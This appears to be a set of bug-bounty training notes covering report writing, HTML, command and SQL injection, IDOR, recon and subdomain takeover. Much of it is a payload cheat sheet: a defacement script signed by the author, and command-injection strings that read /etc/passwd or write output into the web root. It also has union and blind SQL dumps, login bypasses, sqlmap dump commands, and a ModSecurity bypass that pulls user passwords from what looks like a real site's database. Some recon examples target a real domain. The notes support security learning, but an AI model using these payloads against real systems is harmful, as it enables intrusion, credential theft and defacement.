0% found this document useful (0 votes)

160 views119 pages

Bug Hunting

A bug bounty program rewards individuals for reporting security vulnerabilities, with public and private options available. The document outlines the structure of bug reports, types of vulnerabilities like HTML injection and command injection, and provides examples of payloads and prevention methods. It emphasizes the importance of clarity in reports and proper input validation to prevent attacks.

Uploaded by

gonap76701

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

160 views119 pages

Bug Hunting

Uploaded by

gonap76701

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 119

Bug hunting

1.what is bug bounty?

A bug bounty program is a deal offered by many websites, organizations, and software developers by
which individuals can receive recognition and compensation for reporting

bugs, especially those pertaining to security exploits

---> Public Bug Bounty Programs : These programs are open to a wide range of security researchers
and are publicly listed. They attract a larger number of participants, which can lead to more diverse
and comprehensive testing.

---> private Bug Bounty Programs: These programs are invitation-only and are not publicly listed.
They are designed to work with a smaller, curated group of trusted researchers.{ Based on the rank }

Vulnerable Disclousre program [VDP] : A Vulnerability Disclosure Program (VDP) is a structured

framework or process for organizations to document, submit, and report security vulnerabilities to
relevant parties.

Platforms:

1. Hackerone

2. bugcrowd

3. synack

4. openbugbounty

5. https://www.yeswehack.com/

6. https://hackenproof.com/

7.intigriti

8. https://safehats.com/

9. https://www.cyberarmy.id/

10. https://yogosha.com/
practicing platforms:

1. hack the box

2. try hack me

Scope:

1.Inscope

2.out of scope

Vulnerability serverity

P1 (critical)

P2 (high)

P3 (medium)

P4 (low)

P5 (informational)

CVSS v3 Score:

Low (0.1 - 3.9)

Medium (4.0 - 6.9)

High (7.0 - 8.9)

Critical (9.0 - 10.0)

Score caluculator :

https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
Bug bounty report

why reports are important:

1.quick understanding of bug

2.speed fixing and getting paid soon

3.clear legal communications

Structure:

Summary :

Purpose: Provide a high-level overview of the vulnerability. Explain how the vulnerability was
discovered and what type of attack it allows.

Example: "The login page is vulnerable to SQL Injection due to improper sanitization of user input in
the username field. An attacker could extract sensitive data from the database."

1. Title

Purpose: The title should be clear and concise. It gives the reader an immediate
understanding of the type of vulnerability and the impacted area.

Example: "SQL Injection in the Login Endpoint of example.com."

2. Domain (optional)

Purpose: Specify the domain where the vulnerability was found. Ensure that it is
within the defined scope of the bug bounty program.
Example: example.com (inscope)

3. Endpoint (optional)

Purpose: Define the path leading to the page or file that contains the vulnerability.

Example: /login

4. Type

Purpose: Choose the vulnerability type from a standardized list.

Example: SQL Injection

5. Vulnerable Parameter

Purpose: Mention the parameter affected by the vulnerability (e.g., URL query
parameter, form field).

Example: username

6. Summary

Purpose: Provide a high-level overview of the vulnerability. Explain how the

vulnerability was discovered and what type of attack it allows.

Example: "The login page is vulnerable to SQL Injection due to improper sanitization
of user input in the username field. An attacker could extract sensitive data from the database."

7. Proof of Concept (PoC)

Purpose: Detail the steps to reproduce the vulnerability, including the exact requests
and payloads used. Include screenshots or images if needed.

Example:
Step 1: Open the login page: example.com/login.

Step 2: Enter the following in the username field: ' OR 1=1--.

Step 3: Observe that the attacker bypasses the login without knowing the correct
password.

Request:

makefile

Copy code

POST /login

username=' OR 1=1--

password=random

8. Impact

Purpose: Explain the potential business or security impact of the vulnerability. This
helps to determine the severity.

Example: "An attacker could gain unauthorized access to user accounts, leading to a
breach of sensitive data."

CVSS Score: Calculate the Common Vulnerability Scoring System (CVSS) score based
on the severity, using CVSS v3.0.

CVSS Score Example: 9.0 (Critical)

9. Remediation (optional)

Purpose: Offer a recommended fix for the vulnerability. This should be specific and
actionable.

Example: "Implement prepared statements or parameterized queries to ensure user

input is properly sanitized before executing database queries."

Additional Tips for Students

Clarity and Specificity: Avoid using vague language in descriptions and
recommendations.

Proof: Include screenshots, request/response headers, or short videos for complex

issues to strengthen your report.

Review Scope: Always review the bug bounty program's policy to ensure the
vulnerability you're reporting is in scope.

Impact Statement: Reports that don't demonstrate clear impact may be rejected

Html injection

HTML injection is a type of attack where malicious HTML code is inserted into a website

This happens when the website fails to properly sanitize user inputs and embeds those inputs
directly into the HTML code of the page.

This can lead to redirecting to phishing sites ,wepage defacement etc..

Types of HTML Injection :

1.Reflected HTML Injection

2.Stored HTML Injection

* temporary stored

* persistent stored

Also you can use this ways for find this vulnerability:

1. Search Bars
2. Contact Forms
3. Comment Sections
4. User Registration Forms
5. Login Forms
6. Feedback Forms
7. Product Reviews
8. Chat Boxes
9. Newsletter Signup
10. Profile Information, more

Account creation time name field,comment section ,reseting the password email receive time ,chat
history receive time , product order time at name field you will receive the mail.

Payload’s:

https://github.com/InfoSecWarrior/Offensive-Payloads/blob/main/Html-Injection-Payloads.txt

qq<h1>SAI</h1>qq

<button type="button">Click Me!</button>

<video width="320" height="240" controls></video>

<body style="background-color:red">
<embed type="text/html" src="image url link" width="500" height="200"> { image adding in
webpage }

<svg width="100" height="100"><circle cx="50" cy="50" r="40" stroke="green" stroke-width="4"

fill="yellow" /></svg>

<form method="GET">Username: <input type="text" name="username" value="" /> <br

/>Password: <input type="password" name="passwd" value="" /> <br /><input type="submit"
name="submit" value="login" /></form>

<a href="https://www.dishtv.in">SAI</a> { Redirecting to other website }

<script>window.location.href=" website path";</script> { Download a file from server }

Deface payload:

script>

// Change the title of the page

document.title = "Defaced This site by saijain!";

// Change the body content

document.body.innerHTML = `

<div style="<text-align: center; margin-top: 50px;">

<h1 style="color: #ff4757;">Welcome to the Funny Defaced Page!</h1>

<h2 style="color: #2ed573;">You’ve been hacked!</h2>

<p style="font-size: 24px; color: #1e90ff;">

Just kidding! Enjoy this hilarious cat video instead!

</p>

<iframe width="560" height="315"

src="https://youtu.be/kQ33oRB3wGE?si=fsPRKytpn0NtM7wL" frameborder="0"
allowfullscreen></iframe>
<br><br>

<p style="font-size: 20px; color: #ff6348;">Don't forget to laugh!</p>

<img src="https://placekitten.com/400/300" alt="Funny Cat" style="border-radius: 10px;"/>

</div>

</script>

<!DOCTYPE html>

<head>

<meta name="viewport" content="width=device-width, initial-scale=1.0">

<title>Hacked!</title>

<style>

body {

background-color: black;

text-align: center;

font-family: Arial, sans-serif;

h1 {

color: red;

font-size: 50px;

text-shadow: 3px 3px 5px black;

h2 {

color: yellow;

font-size: 35px;

text-shadow: 2px 2px 5px black;

h3 {
color: lime;

font-size: 30px;

text-shadow: 2px 2px 5px black;

color: white;

font-size: 20px;

img {

width: 400px;

height: auto;

margin-top: 20px;

border: 5px solid red;

border-radius: 10px;

.glitch {

animation: glitch 0.5s infinite;

@keyframes glitch {

0% { transform: translateX(0px); }

25% { transform: translateX(5px); }

50% { transform: translateX(-5px); }

75% { transform: translateX(3px); }

100% { transform: translateX(0px); }

</style>

</head>

<body>

<h1 class="glitch">Welcome to the Defaced Page!</h1>

<h2 class="glitch">You Have Been Hacked!</h2>

<h3 class="glitch">This Page Hacked by SAI JAIN</h3>

<p>Security is just an illusion!</p>

</body>

</html>

References:

https://rhashibur75.medium.com/html-injection-bug-bounty-a41f87217118

https://hackerone.com/reports/2210038

https://hackerone.com/reports/358001

https://medium.com/@pratiky054/html-injection-unique-exploitation-a5c3d4e6fed8

https://medium.com/@chaitanyarajhans024/simple-html-injection-to-250-895b760409ed
https://medium.com/@hackwithx24/html-injection-reflected-get-bwapp-series-1-4f595297f5c9

https://medium.com/@gandhim373/new-way-to-find-html-injection-get-easy-bounty-65fdd319d688

https://vedanttekale20.medium.com/how-html-injection-in-email-got-me-my-first-bounty-
761592eab6bb

https://ms-official5878.medium.com/html-injection-a3f791d31b3c

https://hardik-solanki.medium.com/html-injection-stored-which-ultimately-resulted-into-a-cve-
2020-26049-61c1a47dc2e8

https://medium.com/@novan.rmd/how-to-escalate-from-html-injection-to-data-steal-9c7e8ccf72b

https://devstringx-technologies.medium.com/html-injection-f1c9fc713d51

https://medium.com/@Parag_Bagul/my-journey-finding-html-injection-vulnerability-in-a-popular-
british-accountancy-platform-fc051b942d88

https://medium.com/fmisec/what-is-html-injection-1431b26a9d31

https://medium.com/@MoSalah11/how-i-earned-from-html-injection-7b4da98ab6e3

https://medium.com/cyberverse/got-easiest-bounty-with-html-injection-via-email-confirmation-
b1b10575a105

https://www.linkedin.com/pulse/my-first-250-html-injection-bug-yusuf-seboru

https://www.linkedin.com/pulse/html-injection-email-template-aishwarya-ghag
https://hackerone.com/reports/1443567

https://hackerone.com/reports/1581499

How to Prevent HTML Injection?

There is no doubt that the main reason for this attack is the developer’s inattention and lack of
knowledge. This type of injection attack occurs when the input and output are not properly
validated. Therefore the main rule to prevent HTML attack is appropriate data validation.All inputs
should be checked to see if it contains any script code or any HTML code. Usually it is being checked,
if the code contains any special script or HTML brackets – <script></script>, <html></html>.

OS command injection vulnerability

Command Injection is a security vulnerability that allows an attacker to execute arbitrary commands
on a host operating system through a vulnerable web application.

The vulnerability arises when an application uses shell commands to process user input and fails to
properly validate or sanitize it.

Impact :

Data Exfiltration, Deletion, or Modification.

Service Disruption: Attackers can disrupt services or crash systems by running harmful commands.

remote control access (recmote command execution)

Types of Command Injection:

Verbose Command Injection:

The attacker directly sees the output of their injected commands in web application , making it easier
to exploit.

Blind Command Injection:

In this type, the attacker can inject commands but doesn't directly see the output. Instead, they can
infer results based on behavior (such as response time or content of responses).

Payload’s: If the target is linux they have different payloads,If thr target is windows they have
different payloads’s

https://github.com/payloadbox/command-injection-payload-list

; ls -la

|hostname

||whoami

&hostname

;netstat -antp

;cat /etc/passwd

|cat /etc/group

most common parameters for testing Command injection :

Cmd

Cli
User

Upload

File

exec

command

execute

ping

query

jump

code

reg

func

arg

option

load

process

step

read

function

req

feature

exe

module

payload

run

print
Use Burp Suite to intercept and modify a request that checks the stock level.

Modify the storeID parameter, giving it the value 1|whoami.

Observe that the response contains the name of the current user.

Detecting blind OS command injection using time delays

Use Burp Suite to intercept and modify the request that submits feedback.

Modify the email parameter, changing it to:

email=x||ping+-c+10+127.0.0.1||

Observe that the response takes 10 seconds to return.

Exploiting blind OS command injection by redirecting output

Use Burp Suite to intercept and modify the request that submits feedback.

Modify the email parameter, changing it to:

email=||whoami>/var/www/images/output.txt||

Now use Burp Suite to intercept and modify the request that loads an image of a product.

Modify the filename parameter, changing the value to the name of the file you specified for the
output of the injected command:
filename=output.txt

Observe that the response contains the output from the injected command

Exploiting blind OS command injection using out-of-band (OAST) technique

Use Burp Suite to intercept and modify the request that submits feedback.,Modify the email
parameter, changing it to:

email=x||nslookup ‘whoami’ buro code||

you will get the burp suite code , burp >> burp collaborator client >> copy clip board

after editng the resonse forward them and go to , burp >> burp collaborator client and clicl on the
poll now

command injection vulnerability locations :

Login or authentication forms: Systems that use shell commands to verify credentials could be
susceptible if input is not properly sanitized.

File upload or file management systems: Websites that allow file uploads, especially if they provide
features like image resizing or file parsing using shell commands.

Search functionality: If the search feature involves calling system utilities to search for files or content
on the server.

Web hosting or control panels (e.g., cPanel, Plesk): These often provide administrative tools and
functionalities that interact with the underlying server, potentially exposing command injection
vectors.

Website backup systems: Tools that allow users to create backups of their websites could expose
vulnerabilities if they interact with shell commands to compress or archive files.
Data parsing applications: Systems that parse logs, metadata, or XML files may include shell
execution vulnerabilities.

E-commerce sites with advanced user functionality: Systems that allow users to perform tasks like
generating reports, uploading CSVs, or running searches might use shell commands behind the
scenes.

Admin dashboards: Any admin area that executes server-side scripts or commands based on user
input might be prone to this.

Web applications with vulnerable APIs: APIs that accept user input and pass it to the system without
proper validation could lead to command injection.

Content management systems (CMS): Custom-built CMS or vulnerable plugins in popular CMS
platforms (e.g., WordPress, Joomla) might have flaws that lead to command injection.

References:

https://medium.com/@bdemir/a-pentesters-guide-to-command-injection-df2657c8c1ad

https://medium.com/@ashbaarshad777/exploring-os-command-injection-vulnerabilities-with-
portswigger-labs-46453036e6b4
Sql injection

when attackers put harmful sql code into website that can lead to data base hacking.

1. Error-Based SQL Injection

This technique relies on the application returning database error messages.

2. Boolean-Based Blind SQL Injection :

In this technique, the attacker does not receive direct feedback from the database. Instead, they
manipulate queries to evaluate to true or false, deducing information based on the application's
response.

3. Time-Based Blind SQL Injection

Definition: This method relies on the time it takes for the application to respond. If the
query takes longer to execute, it indicates a true condition, while a faster response
indicates false.

How It Works: The attacker injects SQL that includes a time delay (e.g., using SLEEP in
MySQL). By measuring the response time, they can infer whether the injected condition
is true or false.
4.Union-based SQL Injection:

Union-based SQL injection involves the use of the UNION operator that combines the results of
multiple SELECT statements to fetch data from multiple tables as a single result set.

payloads’s: https://github.com/payloadbox/sql-injection-payload-list
id=

pid=

uid=

cid=

rid=

mid=

fid=

tid=

sid=

item=

order=

invoice=

productid=

categoryid=

articleid=

pageid=

userid=

postid=

threadid=

commentid=

newsid=

eventid=

voteid=

pollid=

memberid=

entryid=

listingid=
sessionid=

recordid=

fileid=

docid=

reportid=

customerid=

page=

cat=

type=

sort=

filter=

status=

lang=

year=

date=

search=

keyword=

query=

lookup=

find=

token=

apikey=

user=

email=

username=

password=

session=

auth=

jwt=

key=

access_token=
login=

logout=

redirect=

callback=

cmd=

debug=

exec=

load=

process=

step=

action=

module=

view=

template=

config=

admin=

path=

dir=

folder=

file=

types of sql injection

getbased -geturl

postbased - login forms , sign up,

header based

cookie based

in band :error and union based

inferential :Boolean time based

get based method :

we use identifiers to check if a parameter is vulnerable sql injection.

Id=1'

Id=1""

Id=1 ')

Id=1")

Id=1\

Id=1/

For error solving

Id=1' --+

Id=1"" --+

Id=1 ') --+

Id=1") --+

Id=1\ --+

Id=1/ --+

Id=1 and 0' order by 1--+

Find no of column’s

id=1' order by 4 --+

Find no of vulnerable column’s

id=-1" union all select 1,2,3 --+

Find database name and server version

id=-1' union all select 1,database(),version() --+

Find all databsase’s Name’s

http://localhost/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union all select

1,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHE
MA.SCHEMATA),3 --+

find all tables from database name

http://localhost/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union all select

1,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA
.TABLES+WHERE+TABLE_SCHEMA=0x7365637572697479),3 --+

find all column names from specific table

http://localhost/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union all select

1,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHE
MA.COLUMNS+WHERE+TABLE_NAME=0x7573657273),3 --+

Dump the data from specific db and name and column name

http://localhost/sqli-labs-master/sqli-labs-master/Less-1/?id=-1' union all select

1,(SELECT+GROUP_CONCAT(id+SEPARATOR+0x3c62723e)+FROM+security.users),3 --+

NOTE:using cyber fox browser db and tables and column’s extract feature through the code was
generated and pasted at vulnerable column.

Retrieving the length of database name

‘ AND (length(database())) = 11 --+ page load successfully if the db length is correct.

checking the dbname : you will get the error if the db name is correct .

' OR database()="dbname" – {space after -- }

Checking db 1st character

you will get the error if the the db 1 st character is write

' OR substring(database(),1,1)="s" --+

checking db 2nd character

you will get the error if the the db 2 nd character is write

' OR substring(database(),2,1)="e" --+

post based method: In login forms

we use identifiers to check if a login form is vulnerable sql injection.

I""

For error solving method 1 :

' --

"" --

‘) -- after – give a space important

“) --

\ --

/ --

For error solving method 2 :

"" #

‘) #
“) #

\ #

Find no of column’s

' order by 2 #

[ OR ]

' order by 2 --

Find no of vulnerable column’s

' union all select 1,2 –

[OR]

' union all select 1,2 #

Find database name and server version

' union all select database(),2 #

[OR]

' union all select version(),database() --

Find all data base’s Name’s

' union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM

INFORMATION_SCHEMA.SCHEMATA),2 -- ,' union all select (SELECT GROUP_CONCAT(schema_name
SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 #

[ OR ]
' union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM
INFORMATION_SCHEMA.SCHEMATA),2 -- ,' union all select (SELECT GROUP_CONCAT(schema_name
SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 –

find all tables names from database name

' union all select 1,(SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM

INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479) -- , ' union all select
1,(SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM
INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479) #

[OR]

' union all select 1,(SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM

Find all column names from table:

' union all select (SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273),2 -- , ' union all select
(SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM
INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273),2 #

[OR]

' union all select (SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM

Dump the data from specific db and name and column namecolumn names from specific table

'union all select (SELECT GROUP_CONCAT(id,username SEPARATOR 0x3c62723e) FROM

security.users),2 -- , 'union all select (SELECT GROUP_CONCAT(id,username SEPARATOR 0x3c62723e)
FROM security.users),2 #

[OR]
'union all select (SELECT GROUP_CONCAT(id,username SEPARATOR 0x3c62723e) FROM
security.users),2 -- , 'union all select (SELECT GROUP_CONCAT(id,username SEPARATOR 0x3c62723e)
FROM security.users),2 --

Boolean: In an event out of 2 occurrences only 1 is possible

0 - false

1 -true

User name and password bypass :

' OR 1=1 #

" OR 1=1 #

') OR 1=1 #

") OR 1=1 #

checking the dbname : you will get the error if the db name is correct .

' OR database()="dbname" – {space after -- }

[OR]

' OR database()="dbname" #

ex:security -data base name

Checking db 1st character

you will get the error if the the db 1 st character is write.

' OR substring(database(),1,1)="s" #

[ OR ]

' OR substring(database(),1,1)="s" -- {space after -- }

checking db 2nd character

you will get the error if the the db 2nd character is write.
' OR substring(database(),2,1)="e" #

[OR]

' OR substring(database(),2,1)="e" -- {space after -- }

time based sql injection :

' OR sleep(5) #

Sql map :

It check the parameter vulnerable to what type of sql injection

Sqlmap -u parameterlink –risk=3 –level=5 –batch --random-agent

Extarct data bases’s names :

Sqlmap -u parameterlink –dbs

Extarct tables names from data base name

Sqlmap -u parameterlink -D dbname –tablename

Extarct column names from table name :

Sqlmap -u parameterlink -D dbname –T tablesname –colums

Dump the data

Sqlmap -u parameterlink -D dbname -T tbname -C columnname –dump

Mod security web application Bypass :

Find vulnerable column’s

-1' /!50000union/ /!50000all/ /!50000select/ 1,2,3,4,5,6 --+

Find database name

-1' /!50000union/ /!50000all/ /!50000select/ 1,2,3,database(),5,6 --+

Find server version

-1' /!50000union/ /!50000all/ /!50000select/ 1,2,3,version(),5,6 --+

Find username
-1' /*!50000union*/ /*!50000all*/ /*!50000select*/ 1,2,3,user(),5,6 --+

Find all databases names :*

-1' /!50000union/ /!50000all/ /!50000select/

1,2,3,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+/*!50000FROM*/+INFOR
MATION_SCHEMA.SCHEMATA),5,6 --+

Find tables names from data base name :

-1' /!50000union/ /!50000all/ /!50000select/

1,2,3,(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+/*!50000FROM*/+/*!50000I
NFORMATION_SCHEMA.TABLES*/+/*!50000WHERE*/+TABLE_SCHEMA=0x6d797765626771735f626
16e617374),5,6 --+

Find column name from table name :

-1' /!50000union/ /!50000all/ /!50000select/

1,2,3,(SELECT+GROUP_CONCAT(column_name+SEPARATOR+0x3c62723e)+/*!50000FROM*/+INFOR
MATION_SCHEMA.COLUMNS+/*!50000WHERE*/+TABLE_NAME=0x7573657273),5,6 --+

Dump the data :

-1' /!50000union/ /!50000all/ /!50000select/

1,2,3,(SELECT(@x)/*!50000FROM*/(SELECT(@x:=0x00)
,(SELECT(@x)/*!50000FROM*/(mywebgqs_banast.users)/*!50000WHERE*/(@x)IN(@x:=/*!50000CO
NCAT*/(0x20,@x,user_name,password,0x3c62723e))))x),5,6 --+
Cyber fox browser :

https://sourceforge.net/projects/cyberfox/

Hack bar xpi

https://github.com/emyounoone/Hackbar

References:

https://hackerone.com/reports/1046084

Bwapp lab install on kali linux :

Sudo apt install docker.io -y

Sudo systemctl enable –now docker

Sudo usermod -aG docker $USER

Sudo docker pull hackersploit/bwapp-docker

Sudo docker run -d -p 80:80 hackersploit/bwapp-docker

In browser, 127.0.0.1/install.php , click here to install bwapp

127.0.0.1/login.php

User name=bee and password=bug

Insecure Direct Object Reference (IDOR) Vulnerability

In a web application, whenever a user generates, sends, or receives a request from a server, there
are some HTTP parameters such as “id”, “uid”, “pid” etc that have some unique values which the user
has been assigned. An attacker can see such parameter values in cookies, headers, or wifi Packet
captures. Via this, an attacker might be able to tamper with these values and this tampering may
lead to IDOR.

Directory Traversal: Directory Traversal is also known as a Path Traversal attack where an attacker
can access or manipulates the files and folders which should not be allowed to access publicly. If
there is a Directory Traversal vulnerability exists in a web application then the attacker can easily able
to see some sensitive files or folders such as images, themes, scripts, and so on.

Body Manipulation: Body Manipulation refers to changing or modifying the values in the body such
as modifying the values of input fields, radio buttons, checkboxes, etc.

URL Tampering: URL Tampering refers to changing the parameter value of the URL. For example, let’s
suppose there’s an example URL that may be something like
‘http://example.com/category/photos_id=1’. In this parameter, we are authorized to see the data of
ID ‘1’. But if we could change the value from 1 to 2 such as
‘http://example.com/category/photos_id=2’, and if we could see the data of this particular URL, in
such case it can be considered as URL Tampering.

Cookie ID Manipulation: Generally, cookies are used to store and exchange data between the client
and server. It helps in identifying specific users and provides a good browsing experience to the user.
In such cases, if there’s an IDOR vulnerability then there might be a possibility to manipulate a cookie
ID. For example, there’s a cookie id in a web application that may be something like this _gid=123456
which is for user a, and another cookie id is _gid=789012 which is for user b. So, if user A can change
the value of _gid and replace the ID of user b and can see any information which belongs to user b
then there’s an IDOR.

5.Blind IDOR: The type of IDOR in which the results of the exploitation cannot be seen in the server
response. For example modifying other user private data without accessing it.

6.Generic IDOR: The type of IDOR in which the results of the exploitation can be seen in the server
response. For example accessing confidential data or files belonging to another user.

Parameter:

Id,gid,pip,uid,uuid,user,username,file,file name,dest

EX:account editing time,orders history checking,password changing time,invoice details

time,cancelling the order ,add product to a cart,msg chat reading

IDOR vulnerabilities can be used to exploit filenames to download unauthorized files by changing
the filename:

>> http://www.ifiles.com/download_file.php?a.txt

~ IDOR vulnerabilities can be used to change passwords of different users by hijacking their ids and
accessing their accounts:

>> http://www.ifiles.com/change_password.php?id=1024

idor allows you to delete photos and album from a gallery

allow to insert and delete comments as another user

IDOR Causing Deletion of any account

where IDORs are commonly found

REST APIs 31.8%

GET parameters 25.8%

POST request bodies 21.2%

graphQL endpoints 9.1%

PUT parameters 4.5%

IDs in the request header 3.0%

IDs in the cookies 3.0%

Misc Query langauges 1.5%

References:

https://medium.com/armourinfosec/idor-a-tale-of-account-takeover-77d9066a8055

https://medium.com/@aysebilgegunduz/everything-you-need-to-know-about-idor-insecure-direct-
object-references-375f83e03a87

https://medium.com/@Steiner254/insecure-direct-object-references-idor-16bf0b981b90

https://freedium.cfd/https://medium.com/@BrownBearSec/what-i-learnt-from-reading-220-idor-
bug-reports-6efbea44db7

https://corneacristian.medium.com/top-25-idor-bug-bounty-reports-ba8cd59ad331

OWASP Broken web application lab seup :

https://sourceforge.net/projects/owaspbwa/

Unzip

Open virtual machine { import }

Change network adapter to nat

User name : root password :owaspbwa

Checl ip and go to browser type the ip , you will get lab.

#Google dorks for vdp find’s

inurl /bug bounty

inurl: / security

inurl:security.txt

inurl:security "reward"

inurl: /responsible disclosure

inurl: /responsible-disclosure/ reward

inurl: / responsible-disclosure/ swag

inurl: / responsible-disclosure/ bounty

inurl:'/responsible disclosure' hoodie

responsible disclosure swag r=h:com

responsible disclosure hall of fame

inurl: responsible disclosure $50

#Horizontal correlation :facebook.in , faceboom.cn , facebook.pk , facebook.us

#Vertical correlation : blog.facebook.com , help.facebook.com etc..

#Get asn number’s and ip ranges

https://whois.arin.net/ui/

https://bgp.he.net/

Just provide top company name

#Based on the asn number get more ip ranges

https://mxtoolbox.com/SuperTool.aspx#

Just provide asn number

#Asn details fetching

https://viewdns.info/asnlookup/

Just provide asn number

#find domain names owner by top commany names or email id’s.

https://viewdns.info/reversewhois/

https://www.whoxy.com/

#asn to domain name’s

amass intel -asn no

#domain name to hosts ip

https://search.censys.io/

#cidr to ip range convert

https://ipinfo.io/tools/cidr-to-ip-range-converter

shodan :
Shodan is a search engine designed to find devices connected to the internet, ranging from webcams
and routers to complex industrial control systems.

https://www.shodan.io/

Webcam

port:21

asn:as32934

vuln:CVE-2023-36603

os:windows

os:linux

apache version 2.2

#subdomain enemuration

https://crt.sh/

https://www.virustotal.com/gui/home/search { Relation > sub domain }

https://searchdns.netcraft.com/ { site contains }

https://chaos.projectdiscovery.io/

https://subdomainfinder.c99.nl/

Site:dishtv.in

#sublist3r

Sudo apt install sublist3r

sublist3r -d domain

#amass

amass enum -d domainname

https://github.com/owasp-amass/amass/blob/master/examples/config.yaml

mv config.yaml .config/amass
https://github.com/owasp-amass/amass/blob/master/examples/datasources.yaml

mv datasources.yaml .config/amass

cd .config/amass

nano datasources.yaml { adding api keys kile shodan ,virus total }

#subfinder

sudo apt install subfinder

sudo apt update && sudo apt upgrade

cd .config > cd subfinder > nano provider-config.yaml = adding api key for service provider.

Subfinder -d domainname -o filename

#httpx-toolkit

It sends http request , Display which are subdomain’s responding and not responding.

Sudo su

apt install httpx-toolkit

httpx-toolkit -list file -silent -probe > output.txt

at file just provide subdomain list contains file.

#ffuf -c -u https://FUZZ.dishtv.in -w wordlist mc 200 -rate 100

#word lists:

https://github.com/theMiddleBlue/DNSenum/tree/master/wordlist

https://github.com/n0kovo/n0kovo_subdomains

https://github.com/danielmiessler/SecLists/tree/master/Discovery/DNS

Sub domain takeover

Subdomain takeover happens when a subdomain points to an external service (like GitHub Pages,
AWS S3, Heroku, etc.), but the service is not properly configured. The DNS record remains in place,
but the resource it points to is no longer active or owned, leaving the subdomain vulnerable to
exploitation.

How Does This Happen?

Creating a Subdomain: Imagine you set up a subdomain like shop.example.com to connect to an

online store hosted by a cloud service called Azure.

Service Disconnected: Later, you decide to close your online store and delete it from Azure. However,
the connection from shop.example.com to Azure is still active, even though the store is gone.

Attacker Steps In: A cybercriminal notices that shop.example.com is still connected to Azure but isn't
being used. They create a new store on Azure and link it to shop.example.com.

Takeover Complete: Now, whenever someone visits shop.example.com, they are taken to the
attacker's store instead of yours. The attacker has taken over your subdomain

